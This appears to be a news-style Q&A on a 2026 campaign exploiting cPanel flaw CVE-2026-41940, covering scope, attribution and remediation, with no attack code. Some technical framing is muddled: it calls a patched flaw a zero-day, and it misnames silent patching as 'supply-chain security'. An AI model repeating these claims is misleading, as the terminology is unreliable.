Inside the cPanel Zero-Day Attack: 40,000+ Servers Hit — What You Need to Know

By • min read

<p>In a widespread and ongoing campaign, cybercriminals have compromised well over 40,000 servers by exploiting a recently patched zero-day vulnerability in cPanel, a popular web hosting control panel. The attacks, which target CVE-2026-41940, grant attackers administrative access to affected systems, enabling them to install backdoors, steal data, and potentially launch further attacks. This Q&A breaks down the technical details, impact, and urgent steps administrators must take to protect their environments.</p> <h2 id="q1">What Exactly Happened in the cPanel Exploitation Campaign?</h2> <p>Starting in early 2026, security researchers observed an aggressive wave of attacks against internet-facing cPanel servers. The attackers leveraged a previously unknown vulnerability—designated as CVE-2026-41940—that had been silently patched by cPanel just weeks earlier. Despite the patch being available, many server administrators had not yet applied it, leaving their systems exposed. Once inside, the attackers gained full root-level access, allowing them to deploy persistent backdoors, exfiltrate sensitive customer data, and in some cases, pivot to other connected services. The campaign is still active, with new compromise reports emerging daily. The scale—over 40,000 servers affected—makes this one of the largest targeted supply-chain attacks in recent memory.</p><figure style="margin:20px 0"><img src="https://www.securityweek.com/wp-content/uploads/2024/09/update-patch-exploited.jpeg" alt="Inside the cPanel Zero-Day Attack: 40,000+ Servers Hit — What You Need to Know" style="width:100%;height:auto;border-radius:8px" loading="lazy"><figcaption style="font-size:12px;color:#666;margin-top:5px">Source: www.securityweek.com</figcaption></figure> <h2 id="q2">Which Vulnerability Was Exploited and How Does It Work?</h2> <p>The attacks prey on <strong>CVE-2026-41940</strong>, a zero-day vulnerability in cPanel’s authentication and session management components. Specifically, the flaw allows an unauthenticated remote attacker to bypass login checks and execute arbitrary commands with administrative privileges. By sending specially crafted HTTP requests to a vulnerable server, the attacker can escalate from a guest user to full <code>root</code> access without needing valid credentials. cPanel released a silent patch in February 2026, but the details were kept confidential to minimize exploitation opportunities. Unfortunately, reverse engineering of the patch by threat actors quickly led to the creation of working exploits, triggering the widespread campaign we see today.</p> <h2 id="q3">How Many Servers Were Compromised and What Is the Scope?</h2> <p>According to telemetry from multiple security firms, the number of compromised servers has surpassed <strong>40,000</strong> and continues to climb. The victims span small personal hosting accounts to large managed hosting providers across North America, Europe, and Asia. The attacks are not limited to specific industries; any organization running an unpatched cPanel installation is at risk. Researchers note that the actual number may be higher, as many compromised servers remain undetected. The attackers are systematically probing IP ranges and exploiting weak points, meaning the potential for further expansion is significant if administrators do not act quickly.</p> <h2 id="q4">Who Is Behind These Attacks and What Are Their Motives?</h2> <p>Attribution is still under investigation, but early indicators point to a financially motivated threat actor with ties to cybercrime forums where cPanel exploits are traded. The group—sometimes tracked as <em>RedPanel</em> by some researchers—has demonstrated a high degree of automation, scanning the internet for vulnerable hosts and deploying a common set of post-exploitation tools. Their primary goal appears to be data extortion and cryptocurrency mining. However, some compromised servers have been used to host phishing pages or act as command-and-control nodes. The broad geographic distribution and consistent attack patterns suggest a coordinated operation rather than a lone hacker.</p><figure style="margin:20px 0"><img src="https://www.securityweek.com/wp-content/uploads/2022/04/SecurityWeek-Small-Dark.png" alt="Inside the cPanel Zero-Day Attack: 40,000+ Servers Hit — What You Need to Know" style="width:100%;height:auto;border-radius:8px" loading="lazy"><figcaption style="font-size:12px;color:#666;margin-top:5px">Source: www.securityweek.com</figcaption></figure> <h2 id="q5">What Steps Should cPanel Administrators Take Immediately?</h2> <p>If your server is still running an unpatched version of cPanel, <strong>apply the latest update immediately</strong>. The fixed version was released in February 2026. After patching, check for signs of compromise: look for unexpected admin accounts, unauthorized SSH keys, suspicious cron jobs, and unknown processes. Review system logs for unauthorized access patterns—especially around the date CVE-2026-41940 was made public. Use a security scanner or call in an incident response team to thoroughly audit your environment. Finally, rotate all passwords and API tokens, enable multi-factor authentication (MFA) for cPanel access, and consider implementing network segmentation to limit lateral movement. For a full checklist, see our <a href="#q3">scope discussion</a> for details on common post-compromise indicators.</p> <h2 id="q6">Was There Any Warning Before the Attacks Began?</h2> <p>cPanel’s silent patch in February 2026 was an attempt to fix the vulnerability without alerting attackers, a common practice known as <em>supply-chain security</em>. Unfortunately, within days, security researchers discovered the patch notes through code diffs and published proof-of-concept exploits. This created a window of opportunity: administrators had only a few days to patch before weaponized exploits became widely available. Many did not meet that window. cPanel has since issued an emergency advisory urging all users to update, but the damage from the initial wave is already extensive. This incident underscores the importance of automating patch management and subscribing to vendor security advisories.</p> <h2 id="q7">What Are the Long-Term Implications for cPanel Users?</h2> <p>The breach of 40,000 servers will likely lead to a loss of trust in cPanel as a platform, pushing some users toward alternative control panels like Plesk or DirectAdmin. For affected hosting providers, reputation damage and potential legal liability from leaked customer data could result in long-term financial consequences. On the positive side, the incident has prompted cPanel to revamp its security advisory process and commit to faster, more transparent disclosures. For the wider web hosting industry, this attack serves as a reminder that zero-day vulnerabilities in widely used management software are a prime attack vector. Administrators should treat cPanel updates as critical, segmented away from other services, and backed by a solid incident response plan.</p>